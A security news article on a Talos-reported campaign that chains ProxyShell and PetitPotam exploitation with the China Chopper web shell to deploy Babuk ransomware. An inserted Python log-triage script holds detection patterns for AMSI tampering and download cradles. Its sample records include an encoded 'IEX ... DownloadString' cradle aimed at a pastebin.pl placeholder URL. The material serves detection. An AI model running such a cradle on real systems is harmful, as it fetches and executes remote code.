Researchers at the Cisco Talos threat intelligence group have discovered a new malicious campaign that attempts to exploit the still-unpatched ProxyShell vulnerabilities in Microsoft Exchange email servers together with the Windows PetitPotam vulnerability, once again demonstrating the need to patch critical components. The campaign targets unpatched, vulnerable hosts and deploys Babuk ransomware.
“We assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,” the researchers write.
According to the researchers, the malware is mainly targeting US servers, with a smaller number of infections detected in the United Kingdom, Germany, Ukraine, Finland, Brazil, Honduras, and Thailand.
An unusual infection chain
The researchers say that the malware’s developer, dubbed Tortilla, uses an unusual infection technique.
The chain starts with an intermediate unpacking module hosted on a pastebin.com look-alike called Pastebin.pl. The final payload is loaded into memory before it is executed.
The downloader, according to the researchers, runs an obfuscated PowerShell command to connect to the actor’s infrastructure, which appears to be hosted in Russia, and download another module from it.
The PowerShell command also executes an Antimalware Scan Interface (AMSI) bypass that lets it evade endpoint security detection before launching the Babuk malware.
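As an added illustration that is not part of the Talos report or this article, the script below triages PowerShell Script Block Logging records (Event ID 4104 style) for the stages described above: it decodes any `-EncodedCommand` argument (UTF-16LE base64), then flags AMSI-tampering strings, download cradles, `IEX` execution and the Pastebin.pl staging host. The log records, their `id` values and the URL path are constructed samples; the AMSI record is a harmless string fragment, not a working bypass.

```python
import base64
import re

# Ordered indicator checks for the stages the article describes.
CHECKS = [
    ("amsi_tamper", re.compile(r"amsi(?:utils|initfailed|scanbuffer|context)", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("staging_host", re.compile(r"pastebin\.pl\b", re.I)),
]
# powershell.exe -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def expand_encoded(text: str) -> list[str]:
    """Return the decoded bodies of every -EncodedCommand argument in text."""
    decoded = []
    for m in ENCODED.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore"))
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
    return decoded


def analyze_script_block(text: str) -> list[str]:
    """Tag one ScriptBlockText value; indicators are searched in raw and decoded text."""
    decoded = expand_encoded(text)
    tags = ["encoded_command"] if decoded else []
    corpus = "\n".join([text, *decoded])
    tags.extend(name for name, pat in CHECKS if pat.search(corpus))
    return tags


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> tags for every record that matched at least one indicator."""
    findings = {}
    for ev in events:
        tags = analyze_script_block(ev["ScriptBlockText"])
        if tags:
            findings[ev["id"]] = tags
    return findings


def _enc(cmd: str) -> str:  # encode the way -EncodedCommand expects (UTF-16LE base64)
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample records (not real Tortilla artifacts).
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText": "Get-ChildItem C:\\inetpub\\logs | Measure-Object"},
    {"id": 2, "ScriptBlockText": "powershell -nop -w hidden -EncodedCommand " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://pastebin.pl/PLACEHOLDER')")},
    {"id": 3, "ScriptBlockText": "$a='AmsiUtils'; $b='amsiInitFailed'  # fragment only, not a bypass"},
]
```

Running `triage(SAMPLE_EVENTS)` leaves the benign record untagged and tags the encoded download cradle and the AMSI fragment separately, which is the kind of early-stage signal the researchers' layered-defense advice relies on.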
“The leak of the Babuk builder and its source code in July has contributed to its wide availability, even for the less experienced ransomware operators, such as Tortilla,” the researchers write. They call on end-users to build a layered security defense in order to stop such attacks in their early stages.